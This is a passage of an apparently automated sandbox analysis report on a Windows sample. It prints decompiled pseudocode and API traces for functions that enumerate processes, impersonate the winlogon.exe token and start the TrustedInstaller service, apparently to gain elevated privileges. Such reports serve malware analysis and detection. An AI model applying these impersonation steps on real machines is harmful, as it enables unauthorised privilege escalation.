                                                                                                        • wcschr.MSVCRT ref: 00402259
                                                                                                        • CreateProcessW.KERNEL32 ref: 004022B8
                                                                                                        • GetLastError.KERNEL32(?,?,00000000), ref: 004022C2
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandle$OpenProcess$ErrorLastmemsetwcslen$_wcsicmpwcschrwcscpy$CreateDirectoryManagerRevertSelfSystemToken_wtoiwcscat
                                                                                                        • String ID: ServicesActive$TrustedInstaller.exe$winlogon.exe
                                                                                                        • API String ID: 3201562063-2355939583
                                                                                                        • Opcode ID: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
                                                                                                        • Instruction ID: ccbcfbde9fdc9ff515b0a1e4c69409fc0ea490cdea51ab3e51e2115b03466e24
                                                                                                        • Opcode Fuzzy Hash: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
                                                                                                        • Instruction Fuzzy Hash: 02813A76800209EACF11AFE0CD899AE7BA9FF08308F10457AFA05B21D1D7798A549B59
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004095FD, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 120processlibraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 93%
                                                                                                        			E004095FD(void* __edx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				char _v16;
				char _v24;
				char _v32;
				char _v40;
				char _v48;
				intOrPtr _v52;
				char _v576;
				long _v580;
				intOrPtr _v1112;
				long _v1128;
				void _v1132;
				void* _v1136;
				void _v1658;
				char _v1660;
				void* __edi;
				void* __esi;
				void* _t41;
				long _t49;
				void* _t50;
				intOrPtr* _t66;
				struct HINSTANCE__* _t68;
				void* _t71;
				void* _t83;
				void* _t84;
				void* _t85;

				_t78 = _a4;
				E004099D4(_a4 + 0x28);
				_t41 = CreateToolhelp32Snapshot(2, 0); // executed
				_v12 = _t41;
				memset( &_v1132, 0, 0x228);
				_t84 = _t83 + 0xc;
				_v1136 = 0x22c;
				Process32FirstW(_v12,  &_v1136); // executed
				while(Process32NextW(_v12,  &_v1136) != 0) {
					E004090AF( &_v580);
					_t49 = _v1128;
					_v580 = _t49;
					_v52 = _v1112;
					_t50 = OpenProcess(0x410, 0, _t49);
					_v8 = _t50;
					if(_t50 != 0) {
						L4:
						_v1660 = 0;
						memset( &_v1658, 0, 0x208);
						_t85 = _t84 + 0xc;
						E004098F9(_t78, _v8,  &_v1660);
						if(_v1660 != 0) {
							L10:
							E0040920A( &_v576,  &_v1660);
							E00409555(_v8,  &_v48,  &_v40,  &_v32,  &_v24); // executed
							_t84 = _t85 + 0x14;
							CloseHandle(_v8);
							_t78 = _a4;
							L11:
							E004099ED(_t78 + 0x28,  &_v580);
							continue;
						}
						_v16 = 0x104;
						if( *0x41c8e0 == 0) {
							_t68 = GetModuleHandleW(L"kernel32.dll");
							if(_t68 != 0) {
								 *0x41c8e0 = 1;
								 *0x41c8e4 = GetProcAddress(_t68, "QueryFullProcessImageNameW");
							}
						}
						_t66 =  *0x41c8e4;
						if(_t66 != 0) {
							 *_t66(_v8, 0,  &_v1660,  &_v16); // executed
						}
						goto L10;
					}
					if( *((intOrPtr*)(E00404BAF() + 4)) <= 5) {
						goto L11;
					}
					_t71 = OpenProcess(0x1000, 0, _v580);
					_v8 = _t71;
					if(_t71 == 0) {
						goto L11;
					}
					goto L4;
				}
				return CloseHandle(_v12);
			}






























                                                                                                        0x00409609
                                                                                                        0x0040960f
                                                                                                        0x00409619
                                                                                                        0x00409623
                                                                                                        0x0040962e
                                                                                                        0x00409633
                                                                                                        0x00409640
                                                                                                        0x0040964a
                                                                                                        0x00409782
                                                                                                        0x0040965a
                                                                                                        0x0040965f
                                                                                                        0x00409678
                                                                                                        0x0040967e
                                                                                                        0x00409681
                                                                                                        0x00409685
                                                                                                        0x00409688
                                                                                                        0x004096b2
                                                                                                        0x004096bf
                                                                                                        0x004096c6
                                                                                                        0x004096cb
                                                                                                        0x004096da
                                                                                                        0x004096e6
                                                                                                        0x0040973b
                                                                                                        0x00409747
                                                                                                        0x0040975f
                                                                                                        0x00409764
                                                                                                        0x0040976a
                                                                                                        0x00409770
                                                                                                        0x00409773
                                                                                                        0x0040977d
                                                                                                        0x00000000
                                                                                                        0x0040977d
                                                                                                        0x004096ee
                                                                                                        0x004096f5
                                                                                                        0x004096fc
                                                                                                        0x00409704
                                                                                                        0x0040970c
                                                                                                        0x0040971c
                                                                                                        0x0040971c
                                                                                                        0x00409704
                                                                                                        0x00409721
                                                                                                        0x00409728
                                                                                                        0x00409739
                                                                                                        0x00409739
                                                                                                        0x00000000
                                                                                                        0x00409728
                                                                                                        0x00409693
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004096a5
                                                                                                        0x004096a9
                                                                                                        0x004096ac
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004096ac
                                                                                                        0x004097a6

                                                                                                        APIs
                                                                                                          • Part of subcall function 004099D4: free.MSVCRT(00000000,00409614,?,?,00000000), ref: 004099DB
                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00409619
                                                                                                        • memset.MSVCRT ref: 0040962E
                                                                                                        • Process32FirstW.KERNEL32(?,?), ref: 0040964A
                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,?,?,?,00000000), ref: 00409681
                                                                                                        • OpenProcess.KERNEL32(00001000,00000000,?), ref: 004096A5
                                                                                                        • memset.MSVCRT ref: 004096C6
                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 004096FC
                                                                                                        • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00409716
                                                                                                        • QueryFullProcessImageNameW.KERNELBASE(00000000,00000000,?,00000104,00000000,?), ref: 00409739
                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?), ref: 0040976A
                                                                                                        • Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
                                                                                                        • CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: HandleProcess$CloseOpenProcess32memset$AddressCreateFirstFullImageModuleNameNextProcQuerySnapshotToolhelp32free
                                                                                                        • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                        • API String ID: 239888749-1740548384
                                                                                                        • Opcode ID: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
                                                                                                        • Instruction ID: d99fb1acad5946e2155d0e2cb4f7ec9e68cfc0f9061ce230986eeb1e4b65db1d
                                                                                                        • Opcode Fuzzy Hash: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
                                                                                                        • Instruction Fuzzy Hash: 10413DB2900118EEDB10EFA0DCC5AEEB7B9EB44348F1041BAE609B3191D7359E85DF59
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00409921, Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00409921(struct HINSTANCE__** __esi) {
				void* _t6;
				struct HINSTANCE__* _t7;
				_Unknown_base(*)()* _t12;
				CHAR* _t13;
				intOrPtr* _t17;

				if( *__esi == 0) {
					_t7 = E00405436(L"psapi.dll"); // executed
					 *_t17 = "GetModuleBaseNameW";
					 *__esi = _t7;
					__esi[1] = GetProcAddress(_t7, _t13);
					__esi[2] = GetProcAddress( *__esi, "EnumProcessModules");
					__esi[4] = GetProcAddress( *__esi, "GetModuleFileNameExW");
					__esi[5] = GetProcAddress( *__esi, "EnumProcesses");
					_t12 = GetProcAddress( *__esi, "GetModuleInformation");
					__esi[3] = _t12;
					return _t12;
				}
				return _t6;
			}








                                                                                                        0x00409924
                                                                                                        0x0040992c
                                                                                                        0x00409937
                                                                                                        0x0040993f
                                                                                                        0x0040994a
                                                                                                        0x00409956
                                                                                                        0x00409962
                                                                                                        0x0040996e
                                                                                                        0x00409971
                                                                                                        0x00409973
                                                                                                        0x00000000
                                                                                                        0x00409976
                                                                                                        0x00409977

                                                                                                        APIs
                                                                                                          • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                          • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                          • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                          • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                        • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
                                                                                                        • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
                                                                                                        • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
                                                                                                        • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
                                                                                                        • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$LibraryLoad$memsetwcscat
                                                                                                        • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                        • API String ID: 1529661771-70141382
                                                                                                        • Opcode ID: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
                                                                                                        • Instruction ID: 092d130926b261125bd3b69643a6c94717898c68ce40be050c227dd31faca138
                                                                                                        • Opcode Fuzzy Hash: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
                                                                                                        • Instruction Fuzzy Hash: C7F0D4B4D40704AECB306FB59C09E16BAE1EFA8700B614D3EE0C1A3290D7799044CF48
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040B2C6, Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                        • String ID:
                                                                                                        • API String ID: 2827331108-0
                                                                                                        • Opcode ID: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
                                                                                                        • Instruction ID: dde25c0b0dc41f5004a610fd87b0135bea3e3095e736c0cca49ec984ade2cc6a
                                                                                                        • Opcode Fuzzy Hash: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
                                                                                                        • Instruction Fuzzy Hash: 3D519E71C50604DBCB20AFA4D9889AD77B4FB04710F60823BE861B72D2D7394D82CB9D
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00401AC9, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 80%
                                                                                                        			E00401AC9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, void* _a8, void* _a12, void* _a16) {
				long _v8;
				int _v12;
				intOrPtr _v16;
				int _v20;
				int _v24;
				char _v28;
				void _v538;
				char _v540;
				int _v548;
				char _v564;
				char _v22292;
				void* __edi;
				void* __esi;
				void* _t37;
				int _t43;
				int _t45;
				void* _t48;
				void* _t56;
				signed int _t57;
				long _t61;
				void* _t67;
				long _t69;
				void* _t70;
				void* _t72;
				void* _t74;
				void* _t76;

				_t67 = __edx;
				E0040B550(0x5714, __ecx);
				_t37 = OpenProcess(0x10, 0, _a16);
				_t82 = _t37;
				_a16 = _t37;
				if(_t37 == 0) {
					_t69 = GetLastError();
				} else {
					_t72 =  &_v22292;
					E0040171F(_t72, _t82);
					_v8 = 0;
					_t43 = ReadProcessMemory(_a16, _a8, _t72, 0x54f4,  &_v8); // executed
					if(_t43 == 0) {
						_t69 = GetLastError();
					} else {
						_t48 = E00405642( &_v564);
						_t74 = _v548;
						_t70 = _t48;
						_a12 = _t74;
						_v540 = 0;
						memset( &_v538, 0, 0x1fe);
						asm("cdq");
						_push(_t67);
						_push(_t74);
						_push(_t70);
						_push(L"%d  %I64x");
						_push(0xff);
						_push( &_v540);
						L0040B1EC();
						_v548 = 0;
						E004055D1( &_v540,  &_v564);
						_t16 = _t70 + 0xa; // 0xa
						_t68 = _t16;
						_v24 = 0;
						_v12 = 0;
						_v20 = 0;
						_v16 = 0x100;
						_v28 = 0;
						E0040559A( &_v28, _t16);
						_t76 = _v12;
						_t56 = 0x40c4e8;
						if(_t76 != 0) {
							_t56 = _t76;
						}
						_t26 = _t70 + 2; // 0x2
						_t66 = _t70 + _t26;
						_t57 = ReadProcessMemory(_a16, _a12, _t56, _t70 + _t26,  &_v8); // executed
						_t85 = _t76;
						if(_t76 == 0) {
							_t76 = 0x40c4e8;
						}
						E004055F9(_t57 | 0xffffffff,  &_v564, _t76);
						_t61 = E004022D5(_t66, _t68, _t85, _a4,  &_v22292); // executed
						_t69 = _t61;
						E004055D1(_t61,  &_v28);
					}
					_t45 = FindCloseChangeNotification(_a16); // executed
					E004055D1(_t45,  &_v564);
				}
				return _t69;
			}





























                                                                                                        0x00401ac9
                                                                                                        0x00401ad1
                                                                                                        0x00401ae1
                                                                                                        0x00401ae7
                                                                                                        0x00401ae9
                                                                                                        0x00401aec
                                                                                                        0x00401c1b
                                                                                                        0x00401af2
                                                                                                        0x00401af2
                                                                                                        0x00401af8
                                                                                                        0x00401b0c
                                                                                                        0x00401b12
                                                                                                        0x00401b1a
                                                                                                        0x00401bfd
                                                                                                        0x00401b20
                                                                                                        0x00401b26
                                                                                                        0x00401b2b
                                                                                                        0x00401b36
                                                                                                        0x00401b40
                                                                                                        0x00401b43
                                                                                                        0x00401b4a
                                                                                                        0x00401b54
                                                                                                        0x00401b55
                                                                                                        0x00401b56
                                                                                                        0x00401b57
                                                                                                        0x00401b58
                                                                                                        0x00401b63
                                                                                                        0x00401b68
                                                                                                        0x00401b69
                                                                                                        0x00401b77
                                                                                                        0x00401b7d
                                                                                                        0x00401b82
                                                                                                        0x00401b82
                                                                                                        0x00401b88
                                                                                                        0x00401b8b
                                                                                                        0x00401b8e
                                                                                                        0x00401b91
                                                                                                        0x00401b98
                                                                                                        0x00401b9b
                                                                                                        0x00401ba0
                                                                                                        0x00401ba5
                                                                                                        0x00401baa
                                                                                                        0x00401bac
                                                                                                        0x00401bac
                                                                                                        0x00401bb2
                                                                                                        0x00401bb2
                                                                                                        0x00401bbe
                                                                                                        0x00401bc4
                                                                                                        0x00401bc6
                                                                                                        0x00401bc8
                                                                                                        0x00401bc8
                                                                                                        0x00401bd7
                                                                                                        0x00401be6
                                                                                                        0x00401bee
                                                                                                        0x00401bf0
                                                                                                        0x00401bf0
                                                                                                        0x00401c02
                                                                                                        0x00401c0e
                                                                                                        0x00401c0e
                                                                                                        0x00401c23

                                                                                                        APIs
                                                                                                        • OpenProcess.KERNEL32(00000010,00000000,0040864F,00000000,?,00000000,?,0040864F,?,?,?,00000000), ref: 00401AE1
                                                                                                        • ReadProcessMemory.KERNELBASE(0040864F,?,?,000054F4,00000000,?,0040864F,?,?,?,00000000), ref: 00401B12
                                                                                                        • memset.MSVCRT ref: 00401B4A
                                                                                                        • ReadProcessMemory.KERNELBASE(?,?,0040C4E8,00000002,00000000), ref: 00401BBE
                                                                                                        • _snwprintf.MSVCRT ref: 00401B69
                                                                                                          • Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                                                          • Part of subcall function 0040559A: free.MSVCRT(?,00000000,?,004057E1,00000000,?,00000000), ref: 004055AA
                                                                                                        • GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401BF7
                                                                                                        • FindCloseChangeNotification.KERNELBASE(0040864F,?,0040864F,?,?,?,00000000), ref: 00401C02
                                                                                                        • GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401C15
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Process$ErrorLastMemoryReadfree$ChangeCloseFindNotificationOpen_snwprintfmemset
                                                                                                        • String ID: %d %I64x
                                                                                                        • API String ID: 1126726007-2565891505
                                                                                                        • Opcode ID: 0e39567e62c21eb8595adf136d2f138d4fded52a6135c8fa9db2ff03bc4b818b
                                                                                                        • Instruction ID: f77edfd559f5df329b7cfb23e65bd27f477c8a0de7d8607e39e5f26d9e4a317c
                                                                                                        • Opcode Fuzzy Hash: 0e39567e62c21eb8595adf136d2f138d4fded52a6135c8fa9db2ff03bc4b818b
                                                                                                        • Instruction Fuzzy Hash: FE312A72900519EBDB10EF959C859EE7779EF44304F40057AF504B3291DB349E45CBA8
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00401F04, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 74COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 90%
                                                                                                        			E00401F04(void* __edx, intOrPtr _a4) {
				int _v8;
				void _v538;
				long _v540;
				void _v1066;
				char _v1068;
				long _t30;
				int _t33;
				int _t39;
				void* _t42;
				void* _t45;
				long _t49;

				_t45 = __edx;
				_v540 = 0;
				memset( &_v538, 0, 0x208);
				_v1068 = 0;
				memset( &_v1066, 0, 0x208);
				E00404C3C( &_v540);
				_t48 = L"winlogon.exe";
				_t39 = wcslen(L"winlogon.exe");
				_t8 = wcslen( &_v540) + 1; // 0x1
				_t53 = _t39 + _t8 - 0x104;
				_pop(_t42);
				if(_t39 + _t8 >= 0x104) {
					_v1068 = 0;
				} else {
					E00404BE4( &_v1068,  &_v540, _t48);
					_pop(_t42);
				}
				_v8 = 0;
				_t30 = E00401DF9(_t45, _t53, _a4,  &_v1068,  &_v8); // executed
				_t49 = _t30;
				_t54 = _t49;
				if(_t49 == 0) {
					E00408F48(_t42, _t54, L"SeImpersonatePrivilege"); // executed
					_t33 = ImpersonateLoggedOnUser(_v8); // executed
					if(_t33 == 0) {
						_t49 = GetLastError();
					}
					CloseHandle(_v8);
				}
				return _t49;
			}














                                                                                                        0x00401f04
                                                                                                        0x00401f20
                                                                                                        0x00401f27
                                                                                                        0x00401f38
                                                                                                        0x00401f3f
                                                                                                        0x00401f4e
                                                                                                        0x00401f54
                                                                                                        0x00401f5f
                                                                                                        0x00401f6e
                                                                                                        0x00401f72
                                                                                                        0x00401f77
                                                                                                        0x00401f78
                                                                                                        0x00401f91
                                                                                                        0x00401f7a
                                                                                                        0x00401f88
                                                                                                        0x00401f8e
                                                                                                        0x00401f8e
                                                                                                        0x00401fa6
                                                                                                        0x00401fa9
                                                                                                        0x00401fae
                                                                                                        0x00401fb0
                                                                                                        0x00401fb2
                                                                                                        0x00401fb9
                                                                                                        0x00401fc2
                                                                                                        0x00401fca
                                                                                                        0x00401fd2
                                                                                                        0x00401fd2
                                                                                                        0x00401fd7
                                                                                                        0x00401fd7
                                                                                                        0x00401fe3

                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 00401F27
                                                                                                        • memset.MSVCRT ref: 00401F3F
                                                                                                          • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                                          • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                                        • wcslen.MSVCRT ref: 00401F5A
                                                                                                        • wcslen.MSVCRT ref: 00401F69
                                                                                                        • ImpersonateLoggedOnUser.KERNELBASE(?,0040218D,?,?,?,?,?,?,?,00000000), ref: 00401FC2
                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00401FCC
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 00401FD7
                                                                                                          • Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
                                                                                                          • Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: memsetwcscpywcslen$CloseDirectoryErrorHandleImpersonateLastLoggedSystemUserwcscat
                                                                                                        • String ID: SeImpersonatePrivilege$winlogon.exe
                                                                                                        • API String ID: 3867304300-2177360481
                                                                                                        • Opcode ID: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
                                                                                                        • Instruction ID: dcc5dec8953379ec1552ef046485534b93905478987a0ec3c51696e6dc85d708
                                                                                                        • Opcode Fuzzy Hash: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
                                                                                                        • Instruction Fuzzy Hash: 48214F72940118AACB20A795DC899DFB7BCDF54354F5001BBF608F2191EB345A848BAC
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00401306, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38serviceCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00401306(void* _a4) {
				intOrPtr _v28;
				struct _SERVICE_STATUS _v32;
				void* _t5;
				int _t12;
				void* _t14;

				_t12 = 0; // executed
				_t5 = OpenServiceW(_a4, L"TrustedInstaller", 0x34); // executed
				_t14 = _t5;
				if(_t14 != 0) {
					if(QueryServiceStatus(_t14,  &_v32) != 0 && _v28 != 4) {
						_t12 = StartServiceW(_t14, 0, 0);
					}
					CloseServiceHandle(_t14);
				}
				CloseServiceHandle(_a4);
				return _t12;
			}








                                                                                                        0x00401319
                                                                                                        0x0040131b
                                                                                                        0x00401327
                                                                                                        0x0040132b
                                                                                                        0x0040133a
                                                                                                        0x0040134b
                                                                                                        0x0040134b
                                                                                                        0x0040134e
                                                                                                        0x0040134e
                                                                                                        0x00401353
                                                                                                        0x0040135b

                                                                                                        APIs
                                                                                                        • OpenServiceW.ADVAPI32(00402183,TrustedInstaller,00000034,?,?,00000000,?,?,?,?,?,00402183,00000000), ref: 0040131B
                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,00402183,00000000), ref: 00401332
                                                                                                        • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 00401345
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,00402183,00000000), ref: 0040134E
                                                                                                        • CloseServiceHandle.ADVAPI32(00402183,?,?,?,?,?,00402183,00000000), ref: 00401353
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Service$CloseHandle$OpenQueryStartStatus
                                                                                                        • String ID: TrustedInstaller
                                                                                                        • API String ID: 862991418-565535830
                                                                                                        • Opcode ID: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
                                                                                                        • Instruction ID: 300c39592a487ff017dde1f9aaf4b69bffecac74e3568357a1b40912e0f2caec
                                                                                                        • Opcode Fuzzy Hash: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
                                                                                                        • Instruction Fuzzy Hash: F9F08275601218FBE7222BE59CC8DAF7A6CDF88794B040132FD01B12A0D674DD05C9F9
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00409555, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00409555(void* _a4, struct _FILETIME* _a8, struct _FILETIME* _a12, struct _FILETIME* _a16, struct _FILETIME* _a20) {
				int _t8;
				struct HINSTANCE__* _t9;

				if( *0x41c8e8 == 0) {
					_t9 = GetModuleHandleW(L"kernel32.dll");
					if(_t9 != 0) {
						 *0x41c8e8 = 1;
						 *0x41c8ec = GetProcAddress(_t9, "GetProcessTimes");
					}
				}
				if( *0x41c8ec == 0) {
					return 0;
				} else {
					_t8 = GetProcessTimes(_a4, _a8, _a12, _a16, _a20); // executed
					return _t8;
				}
			}





                                                                                                        0x0040955f
                                                                                                        0x00409566
                                                                                                        0x0040956e
                                                                                                        0x00409576
                                                                                                        0x00409586
                                                                                                        0x00409586
                                                                                                        0x0040956e
                                                                                                        0x00409592
                                                                                                        0x004095aa
                                                                                                        0x00409594
                                                                                                        0x004095a3
                                                                                                        0x004095a6
                                                                                                        0x004095a6

                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 00409566
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00409580
                                                                                                        • GetProcessTimes.KERNELBASE(00000000,00401DD3,?,?,?,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 004095A3
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: AddressHandleModuleProcProcessTimes
                                                                                                        • String ID: GetProcessTimes$kernel32.dll
                                                                                                        • API String ID: 1714573020-3385500049
                                                                                                        • Opcode ID: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
                                                                                                        • Instruction ID: 684c615278f70e6dc9f1b796aa494e436c9634249af5aea594c4fe29f2bd0140
                                                                                                        • Opcode Fuzzy Hash: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
